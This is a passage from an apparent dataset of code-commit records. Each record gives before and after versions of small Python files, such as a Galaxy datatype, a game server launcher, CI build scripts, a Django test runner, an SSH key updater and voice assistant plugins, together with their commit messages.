k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import os
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
<commit_msg>Fix pylint warning: Unused import os<commit_after> | """
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
| """
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import os
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
Fix pylint warning: Unused import os"""
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
| <commit_before>"""
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import os
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
<commit_msg>Fix pylint warning: Unused import os<commit_after>"""
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
|
cbd9c312b857565bfebc2d9f8452453ca333ba92 | giles.py | giles.py | #!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
server = giles.server.Server()
server.instantiate()
server.loop()
| #!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
import sys
server = giles.server.Server()
if len(sys.argv) == 2:
port = int(sys.argv[1])
else:
port = 9435
server.instantiate(port)
server.loop()
| Support choosing a port on the command line. | Support choosing a port on the command line.
Just put a number as the only CLI for now. Useful for me testing
changes now that I'm actually keeping the server running.
| Python | agpl-3.0 | sunfall/giles | #!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
server = giles.server.Server()
server.instantiate()
server.loop()
Support choosing a port on the command line.
Just put a number as the only CLI for now. Useful for me testing
changes now that I'm actually keeping the server running. | #!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
import sys
server = giles.server.Server()
if len(sys.argv) == 2:
port = int(sys.argv[1])
else:
port = 9435
server.instantiate(port)
server.loop()
| <commit_before>#!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
server = giles.server.Server()
server.instantiate()
server.loop()
<commit_msg>Support choosing a port on the command line.
Just put a number as the only CLI for now. Useful for me testing
changes now that I'm actually keeping the server running.<commit_after> | #!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
import sys
server = giles.server.Server()
if len(sys.argv) == 2:
port = int(sys.argv[1])
else:
port = 9435
server.instantiate(port)
server.loop()
| #!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
server = giles.server.Server()
server.instantiate()
server.loop()
Support choosing a port on the command line.
Just put a number as the only CLI for now. Useful for me testing
changes now that I'm actually keeping the server running.#!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
import sys
server = giles.server.Server()
if len(sys.argv) == 2:
port = int(sys.argv[1])
else:
port = 9435
server.instantiate(port)
server.loop()
| <commit_before>#!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
server = giles.server.Server()
server.instantiate()
server.loop()
<commit_msg>Support choosing a port on the command line.
Just put a number as the only CLI for now. Useful for me testing
changes now that I'm actually keeping the server running.<commit_after>#!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
import sys
server = giles.server.Server()
if len(sys.argv) == 2:
port = int(sys.argv[1])
else:
port = 9435
server.instantiate(port)
server.loop()
|
5d2f585779bef5e8bd82e7f4e7b46818153af711 | build.py | build.py | from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builder.run()
| from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builds = []
for settings, options, env_vars, build_requires, reference in builder.items:
settings["cppstd"] = 14
builds.append([settings, options, env_vars, build_requires])
builder.builds = builds
builder.run()
| Use std 14 in CI | CI: Use std 14 in CI
| Python | mit | zhuhaow/libnekit,zhuhaow/libnekit,zhuhaow/libnekit,zhuhaow/libnekit | from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builder.run()
CI: Use std 14 in CI | from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builds = []
for settings, options, env_vars, build_requires, reference in builder.items:
settings["cppstd"] = 14
builds.append([settings, options, env_vars, build_requires])
builder.builds = builds
builder.run()
| <commit_before>from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builder.run()
<commit_msg>CI: Use std 14 in CI<commit_after> | from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builds = []
for settings, options, env_vars, build_requires, reference in builder.items:
settings["cppstd"] = 14
builds.append([settings, options, env_vars, build_requires])
builder.builds = builds
builder.run()
| from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builder.run()
CI: Use std 14 in CIfrom conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builds = []
for settings, options, env_vars, build_requires, reference in builder.items:
settings["cppstd"] = 14
builds.append([settings, options, env_vars, build_requires])
builder.builds = builds
builder.run()
| <commit_before>from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builder.run()
<commit_msg>CI: Use std 14 in CI<commit_after>from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builds = []
for settings, options, env_vars, build_requires, reference in builder.items:
settings["cppstd"] = 14
builds.append([settings, options, env_vars, build_requires])
builder.builds = builds
builder.run()
|
6b4f4f07c442705f76294b9ec9a37d3d02ca1551 | run_tests.py | run_tests.py | #!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if names and re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif names and not names.startswith('tests.'):
names = 'tests.tests.' + names
else:
names = 'tests'
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
| #!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if not names:
names = 'tests'
elif re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif not names.startswith('tests.'):
names = 'tests.tests.' + names
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
| Allow running separate test files | Allow running separate test files
With e.g.:
./runtests.py tests.tests_transactions
| Python | bsd-3-clause | rutube/django-cacheops,Suor/django-cacheops,LPgenerator/django-cacheops,ErwinJunge/django-cacheops,bourivouh/django-cacheops | #!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if names and re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif names and not names.startswith('tests.'):
names = 'tests.tests.' + names
else:
names = 'tests'
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
Allow running separate test files
With e.g.:
./runtests.py tests.tests_transactions | #!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if not names:
names = 'tests'
elif re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif not names.startswith('tests.'):
names = 'tests.tests.' + names
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
| <commit_before>#!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if names and re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif names and not names.startswith('tests.'):
names = 'tests.tests.' + names
else:
names = 'tests'
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
<commit_msg>Allow running separate test files
With e.g.:
./runtests.py tests.tests_transactions<commit_after> | #!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if not names:
names = 'tests'
elif re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif not names.startswith('tests.'):
names = 'tests.tests.' + names
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
| #!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if names and re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif names and not names.startswith('tests.'):
names = 'tests.tests.' + names
else:
names = 'tests'
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
Allow running separate test files
With e.g.:
./runtests.py tests.tests_transactions#!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if not names:
names = 'tests'
elif re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif not names.startswith('tests.'):
names = 'tests.tests.' + names
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
| <commit_before>#!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if names and re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif names and not names.startswith('tests.'):
names = 'tests.tests.' + names
else:
names = 'tests'
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
<commit_msg>Allow running separate test files
With e.g.:
./runtests.py tests.tests_transactions<commit_after>#!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if not names:
names = 'tests'
elif re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif not names.startswith('tests.'):
names = 'tests.tests.' + names
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
|
a5ce33cf60deb5a1045a0bf693b58eb20dbad8d2 | sshkeys_update.py | sshkeys_update.py | #!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open('.ssh/authorized_keys', 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
| #!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open(os.path.expanduser('~submit/.ssh/authorized_keys'), 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
| Make sure to write in ~submit's authorized_keys. | Make sure to write in ~submit's authorized_keys.
| Python | bsd-3-clause | pydotorg/pypi,pydotorg/pypi,pydotorg/pypi,pydotorg/pypi | #!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open('.ssh/authorized_keys', 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
Make sure to write in ~submit's authorized_keys. | #!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open(os.path.expanduser('~submit/.ssh/authorized_keys'), 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
| <commit_before>#!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open('.ssh/authorized_keys', 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
<commit_msg>Make sure to write in ~submit's authorized_keys.<commit_after> | #!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open(os.path.expanduser('~submit/.ssh/authorized_keys'), 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
| #!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open('.ssh/authorized_keys', 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
Make sure to write in ~submit's authorized_keys.#!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open(os.path.expanduser('~submit/.ssh/authorized_keys'), 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
| <commit_before>#!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open('.ssh/authorized_keys', 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
<commit_msg>Make sure to write in ~submit's authorized_keys.<commit_after>#!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open(os.path.expanduser('~submit/.ssh/authorized_keys'), 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
|
90284fabbbbb1f6e7bda1cf33bdc39a1d76a25d4 | jarviscli/plugins/voice.py | jarviscli/plugins/voice.py | from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
| from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
# TODO: Add a message if voice is disabled
@plugin('talk faster')
def talk_faster(jarvis, s):
jarvis.change_speech_rate(25)
@plugin('talk slower')
def talk_slower(jarvis, s):
jarvis.change_speech_rate(-25) | Add plugins for talking faster and slower | Add plugins for talking faster and slower
| Python | mit | sukeesh/Jarvis,sukeesh/Jarvis,sukeesh/Jarvis,sukeesh/Jarvis | from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
Add plugins for talking faster and slower | from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
# TODO: Add a message if voice is disabled
@plugin('talk faster')
def talk_faster(jarvis, s):
jarvis.change_speech_rate(25)
@plugin('talk slower')
def talk_slower(jarvis, s):
jarvis.change_speech_rate(-25) | <commit_before>from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
<commit_msg>Add plugins for talking faster and slower<commit_after> | from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
# TODO: Add a message if voice is disabled
@plugin('talk faster')
def talk_faster(jarvis, s):
jarvis.change_speech_rate(25)
@plugin('talk slower')
def talk_slower(jarvis, s):
jarvis.change_speech_rate(-25) | from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
